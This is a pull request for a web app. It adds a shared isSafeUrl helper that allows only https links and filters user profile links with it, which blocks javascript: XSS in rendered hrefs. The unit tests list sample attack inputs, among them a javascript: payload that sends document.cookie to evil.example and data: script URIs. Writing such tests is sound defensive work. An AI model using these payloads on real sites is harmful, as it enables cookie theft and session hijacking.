### PR TITLE
fix(profile): allow-list URL scheme on personalLinks render (#258)

### DIFF
--- a/src/app/profile/[pageUserId]/ui.tsx
+++ b/src/app/profile/[pageUserId]/ui.tsx
@@ -19,6 +19,7 @@ import {
   formatSelectedDate,
   toDateKey,
 } from '@/lib/profile/scheduleFormatters';
+import { isSafeUrl } from '@/lib/url/isSafeUrl';
 
 import {
   ProfileContentSkeleton,
@@ -103,21 +104,23 @@ export default function ProfilePageUI({
                 </p>
                 {!!userData.personalLinks?.length && (
                   <div className="flex flex-wrap items-center justify-center gap-2 sm:justify-start">
-                    {userData.personalLinks.map((link) => (
-                      <a
-                        key={link.platform}
-                        href={link.url}
-                        target="_blank"
-                        rel="noopener noreferrer"
-                        className="hover:text-blue-600 text-gray-600"
-                        title={
-                          platformLabelMap[link.platform]?.label ||
-                          link.platform
-                        }
-                      >
-                        {platformLabelMap[link.platform]?.icon}
-                      </a>
-                    ))}
+                    {userData.personalLinks
+                      .filter((link) => isSafeUrl(link.url))
+                      .map((link) => (
+                        <a
+                          key={link.platform}
+                          href={link.url}
+                          target="_blank"
+                          rel="noopener noreferrer"
+                          className="hover:text-blue-600 text-gray-600"
+                          title={
+                            platformLabelMap[link.platform]?.label ||
+                            link.platform
+                          }
+                        >
+                          {platformLabelMap[link.platform]?.icon}
+                        </a>
+                      ))}
                   </div>
                 )}
               </div>

--- a/src/components/layout/Header/ShareProfileDialog.tsx
+++ b/src/components/layout/Header/ShareProfileDialog.tsx
@@ -8,6 +8,7 @@ import DefaultAvatarImgUrl from '@/assets/default-avatar.png';
 import { platformLabelMap } from '@/components/profile/social-links/platformLabelMap';
 import { Button } from '@/components/ui/button';
 import { trackEvent } from '@/lib/analytics';
+import { isSafeUrl } from '@/lib/url/isSafeUrl';
 import type { PersonalLink } from '@/types/types';
 
 async function copyToClipboard(text: string): Promise<boolean> {
@@ -128,18 +129,20 @@ export function ShareProfileDialog({
                       {name}
                     </p>
 
-                    {personalLinks?.map((link) => (
-                      <a
-                        key={link.platform}
-                        href={link.url}
-                        target="_blank"
-                        rel="noopener noreferrer"
-                        aria-label={`前往 ${platformLabelMap[link.platform]?.label ?? link.platform} 頁面`}
-                        className="shrink-0"
-                      >
-                        {platformLabelMap[link.platform]?.icon}
-                      </a>
-                    ))}
+                    {personalLinks
+                      ?.filter((link) => isSafeUrl(link.url))
+                      .map((link) => (
+                        <a
+                          key={link.platform}
+                          href={link.url}
+                          target="_blank"
+                          rel="noopener noreferrer"
+                          aria-label={`前往 ${platformLabelMap[link.platform]?.label ?? link.platform} 頁面`}
+                          className="shrink-0"
+                        >
+                          {platformLabelMap[link.platform]?.icon}
+                        </a>
+                      ))}
                   </div>
 
                   {subtitle ? (

--- a/src/hooks/user/user-data/useUserData.ts
+++ b/src/hooks/user/user-data/useUserData.ts
@@ -1,5 +1,6 @@
 import { TotalWorkSpanEnum } from '@/components/onboarding/steps/constant';
 import useTagCatalog from '@/hooks/user/tags/useTagCatalog';
+import { isSafeUrl } from '@/lib/url/isSafeUrl';
 import { ExperienceType } from '@/services/profile/experienceType';
 import {
   buildTagLabelMap,
@@ -130,9 +131,13 @@ function parseUserDtoToUserType(
   const educations = educationBlocks.flatMap((b) =>
     getMetadataArray<EducationExperienceMetadata>(b)
   );
+  // Drop links whose URL doesn't pass the scheme allow-list. The form schema
+  // already blocks javascript:, but profiles can be written via direct BFF
+  // calls — render-time filtering closes that bypass before <a href> ever
+  // sees the value.
   const personalLinks = linkBlocks
     .flatMap((b) => getMetadataArray<PersonalLinkMetadata>(b))
-    .filter((l) => Boolean(l.url));
+    .filter((l) => isSafeUrl(l.url));
 
   // BFF emits industry enriched (TagVO-shaped); OpenAPI types it as
   // `Record<string, never>`. Pull subject through the local TagVO type.

--- a/src/lib/seo/sanitizePublicProfile.ts
+++ b/src/lib/seo/sanitizePublicProfile.ts
@@ -1,3 +1,4 @@
+import { isSafeUrl } from '@/lib/url/isSafeUrl';
 import { ExperienceType } from '@/services/profile/experienceType';
 import type { MentorProfileVO } from '@/services/profile/user';
 import type { TagVO } from '@/types/tag';
@@ -54,15 +55,6 @@ interface LinkMetadata {
   url?: string;
 }
 
-function isHttpsUrl(url: string): boolean {
-  try {
-    const parsed = new URL(url);
-    return parsed.protocol === 'https:';
-  } catch {
-    return false;
-  }
-}
-
 function getBlocks(
   experiences: MentorProfileVO['experiences'] | null | undefined,
   category: string
@@ -116,7 +108,7 @@ function pickPublicLinks(profile: MentorProfileVO): PublicPersonalLink[] {
     if (
       platform &&
       SOCIAL_PLATFORMS.includes(platform) &&
-      isHttpsUrl(url) &&
+      isSafeUrl(url) &&
       !seen.has(platform)
     ) {
       seen.add(platform);

--- a/src/lib/url/isSafeUrl.test.ts
+++ b/src/lib/url/isSafeUrl.test.ts
@@ -1,0 +1,40 @@
+import { describe, expect, it } from 'vitest';
+
+import { isSafeUrl } from './isSafeUrl';
+
+describe('isSafeUrl', () => {
+  it('accepts https:// URLs', () => {
+    expect(isSafeUrl('https://www.linkedin.com/in/foo')).toBe(true);
+    expect(isSafeUrl('https://example.com')).toBe(true);
+  });
+
+  it('rejects http:// URLs to enforce TLS for outbound profile links', () => {
+    expect(isSafeUrl('http://example.com')).toBe(false);
+  });
+
+  it('rejects javascript: URIs (the XSS sink this guard exists for)', () => {
+    expect(isSafeUrl('javascript:alert(1)')).toBe(false);
+    expect(isSafeUrl('JAVASCRIPT:alert(1)')).toBe(false);
+    expect(
+      isSafeUrl('  javascript:fetch("https://evil.example/?"+document.cookie)')
+    ).toBe(false);
+  });
+
+  it('rejects other dangerous schemes', () => {
+    expect(isSafeUrl('data:text/html,<script>alert(1)</script>')).toBe(false);
+    expect(isSafeUrl('vbscript:msgbox("xss")')).toBe(false);
+    expect(isSafeUrl('file:///etc/passwd')).toBe(false);
+  });
+
+  it('rejects scheme-less or malformed values', () => {
+    expect(isSafeUrl('linkedin.com/in/foo')).toBe(false);
+    expect(isSafeUrl('//evil.example')).toBe(false);
+    expect(isSafeUrl('not a url')).toBe(false);
+  });
+
+  it('rejects empty / nullish input', () => {
+    expect(isSafeUrl('')).toBe(false);
+    expect(isSafeUrl(null)).toBe(false);
+    expect(isSafeUrl(undefined)).toBe(false);
+  });
+});

--- a/src/lib/url/isSafeUrl.ts
+++ b/src/lib/url/isSafeUrl.ts
@@ -1,0 +1,15 @@
+/**
+ * Allow-list URL scheme guard for any value that flows into an `<a href>`.
+ * Blocks `javascript:`, `data:`, `vbscript:`, etc., which would otherwise
+ * execute in the current origin when clicked. Only `https:` is accepted —
+ * matches the SEO sanitizer's policy so UI render and JSON-LD stay aligned.
+ */
+export function isSafeUrl(url: string | null | undefined): boolean {
+  if (!url) return false;
+  try {
+    const parsed = new URL(url);
+    return parsed.protocol === 'https:';
+  } catch {
+    return false;
+  }
+}


### PR DESCRIPTION
## What Does This PR Do?

- Add shared `isSafeUrl` helper (`src/lib/url/isSafeUrl.ts`) that only accepts `https:` URLs, with unit tests covering `javascript:`, `data:`, `vbscript:`, `file:`, scheme-less, and empty inputs.
- Filter `personalLinks` in `useUserData` so values that fail the scheme check never reach the UI — closes the bypass where a profile is written via direct BFF call rather than the form.
- Add defensive `<a href>` guards in `src/app/profile/[pageUserId]/ui.tsx` and `ShareProfileDialog.tsx` so render sinks remain safe even if a future caller skips `useUserData`.
- Replace the file-private `isHttpsUrl` in `sanitizePublicProfile.ts` with the shared helper to keep SEO and UI on a single policy.

Form-layer Zod schemas (`linkedinLinkSchema`, …, `websiteLinkSchema`) already block `javascript:` via hostname / `^https?://` checks — this PR adds the missing render-time defense in depth. A follow-up backend ticket on X-Career-User is recommended to complete the chain.

Closes Xchange-Taiwan/X-Talent-Tracker#258

## Demo

http://localhost:3000/profile/<mentor-id>

## Screenshot

N/A

## Anything to Note?

- Existing `http://` profile links will be silently hidden after this change. Worth a quick read-only count on the backend before merge to gauge impact; if the number is non-trivial, a backfill / owner-side warning UX should be tracked separately.
- A backend ticket should be filed on X-Career-User for server-side scheme validation.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
